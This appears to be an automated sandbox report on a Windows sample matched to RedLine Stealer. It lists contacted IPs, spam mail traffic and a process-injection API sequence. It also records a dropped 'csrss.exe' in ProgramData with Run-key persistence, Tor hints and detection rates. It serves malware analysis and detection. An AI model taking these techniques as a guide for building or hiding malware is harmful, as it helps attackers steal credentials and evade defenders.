Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:56137 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:56116 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:55706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 15.236.29.106:443 -> 192.168.2.4:56264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.185.0.1:443 -> 192.168.2.4:56300 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56312 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:56317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.235.200.147:443 -> 192.168.2.4:56351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:56307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.250.126.5:443 -> 192.168.2.4:56379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.220.219.189:443 -> 192.168.2.4:56352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56391 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.40.150.54:443 -> 192.168.2.4:56417 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.210.96.117:443 -> 192.168.2.4:56432 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:56411 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.136.104.255:443 -> 192.168.2.4:56409 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:56421 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56435 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56451 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:56533 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56567 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:56577 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56618 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.168.220.210:443 -> 192.168.2.4:56801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:56815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:56828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:56848 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:56882 version: TLS 1.2
Source: unknownHTTPS traffic detected: 117.20.63.148:443 -> 192.168.2.4:56894 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:57033 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:57066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:57176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:57161 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.0.13.44:443 -> 192.168.2.4:57253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.135.132.105:443 -> 192.168.2.4:57282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 164.52.221.51:443 -> 192.168.2.4:57155 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:57406 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:57389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.47.252.115:443 -> 192.168.2.4:57447 version: TLS 1.2
Source: unknownHTTPS traffic detected: 54.233.137.124:443 -> 192.168.2.4:57801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:57825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 120.88.73.238:443 -> 192.168.2.4:57854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:58017 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.111.240.6:443 -> 192.168.2.4:58194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.228.96.142:443 -> 192.168.2.4:58314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 144.202.62.131:443 -> 192.168.2.4:59179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.229.0.171:443 -> 192.168.2.4:59256 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Send many emails (e-Mail Spam)
Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 40

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: klWGq3yDcQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.1679577642.00000000023E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.1864389783.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 5984
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_00410C9C0_2_00410C9C
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_00412DC60_2_00412DC6
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_004111E00_2_004111E0
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_00411E1C0_2_00411E1C
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_0040C7FA0_2_0040C7FA
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: String function: 004095AC appears 35 times
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_025B0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_025B0110
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_02A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,2_2_02A00110
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess Stats: CPU usage > 49%
Source: klWGq3yDcQ.exeBinary or memory string: OriginalFilename vs klWGq3yDcQ.exe
Source: klWGq3yDcQ.exe, 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSoldier@ vs klWGq3yDcQ.exe
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000843000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCSRSS.Exej% vs klWGq3yDcQ.exe
Source: klWGq3yDcQ.exe, 00000001.00000000.1678882805.0000000000687000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSoldier@ vs klWGq3yDcQ.exe
Source: klWGq3yDcQ.exeBinary or memory string: OriginalFilenameSoldier@ vs klWGq3yDcQ.exe
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: csunsapi.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: swift.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: nfhwcrhk.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: surewarehook.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: csunsapi.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: aep.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: atasi.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: swift.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: nfhwcrhk.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: nuronssl.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: surewarehook.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: ubsec.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: aep.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: atasi.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: swift.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: nfhwcrhk.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: nuronssl.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: surewarehook.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: ubsec.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: propsys.dllJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeSection loaded: mswsock.dllJump to behavior
Source: klWGq3yDcQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: klWGq3yDcQ.exeReversingLabs: Detection: 70%
Source: klWGq3yDcQ.exeVirustotal: Detection: 67%
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile read: C:\Users\user\Desktop\klWGq3yDcQ.exeJump to behavior
Source: klWGq3yDcQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\klWGq3yDcQ.exe C:\Users\user\Desktop\klWGq3yDcQ.exe
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Users\user\Desktop\klWGq3yDcQ.exe C:\Users\user\Desktop\klWGq3yDcQ.exe
Source: unknownProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 5984
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 25500
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38276
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 260
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6240 -s 38328
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess created: C:\Users\user\Desktop\klWGq3yDcQ.exe C:\Users\user\Desktop\klWGq3yDcQ.exeJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile created: C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\Jump to behavior
Source: classification engineClassification label: mal99.spre.troj.expl.evad.winEXE@11/20@846/100
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_023E97C6 CreateToolhelp32Snapshot,Module32First,0_2_023E97C6
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6240
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCommand line argument: Lt]0_2_004043A4
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCommand line argument: eyi0_2_004043A4
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: klWGq3yDcQ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: klWGq3yDcQ.exeStatic file information: File size 1973248 > 1048576
Source: klWGq3yDcQ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d2400
Source: klWGq3yDcQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: "C:\telurayutejaxe.pdb source: klWGq3yDcQ.exe
Source: Binary string: C:\telurayutejaxe.pdb source: klWGq3yDcQ.exe
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_004095F1 push ecx; ret 0_2_00409604
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_005D1E70 push eax; ret 0_2_005D1E8E
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_004066F3 push ecx; ret 0_2_00406706
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_02543A58 push eax; retf 0_2_02543A5A
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_02490A3E push ds; ret 0_2_02490A3F
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_02537AE7 push esi; iretd 0_2_02537AF2
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_02543AB7 push A7EF5AB4h; ret 0_2_02543ABE
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_024512BC push ebx; iretd 0_2_024512BD
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_0240B7AE push ebp; ret 0_2_0240B7BA
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_02474415 push edx; ret 0_2_02474417
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 1_2_00696299 push ecx; ret 1_2_006962AC
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0295AA97 push A7EF5AB4h; ret 2_2_0295AA9E
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0286829C push ebx; iretd 2_2_0286829D
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0294EAC7 push esi; iretd 2_2_0294EAD2
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_028A7A1E push ds; ret 2_2_028A7A1F
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0295AA38 push eax; retf 2_2_0295AA3A
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0282278E push ebp; ret 2_2_0282279A
Source: C:\ProgramData\Drivers\csrss.exeCode function: 2_2_0288B3F5 push edx; ret 2_2_0288B3F7
Source: C:\ProgramData\Drivers\csrss.exeCode function: 4_2_00696299 push ecx; ret 4_2_006962AC
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeCode function: 0_2_0040410B LoadLibraryW,GetProcAddress,VirtualProtect,0_2_0040410B
Source: initial sampleStatic PE information: section name: .text entropy: 7.957840457952121
Source: initial sampleStatic PE information: section name: .text entropy: 7.957840457952121

Persistence and Installation Behavior

barindex
Drops PE files with benign system names
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeFile created: C:\ProgramData\Drivers\csrss.exeJump to dropped file
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run CSRSSJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 55306 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 55306
Source: unknownNetwork traffic detected: HTTP traffic on port 59433 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 59433
Source: unknownNetwork traffic detected: HTTP traffic on port 63912 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 63912
Source: unknownNetwork traffic detected: HTTP traffic on port 52568 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 52568
Source: unknownNetwork traffic detected: HTTP traffic on port 56380 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 56380
Source: unknownNetwork traffic detected: HTTP traffic on port 57202 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 57202
Source: unknownNetwork traffic detected: HTTP traffic on port 58605 -> 2030
Source: unknownNetwork traffic detected: HTTP traffic on port 2030 -> 58605
May use the Tor software to hide its network traffic
Source: klWGq3yDcQ.exe, 00000001.00000002.2866921685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csrss.exe, 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: onion-port
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\klWGq3yDcQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
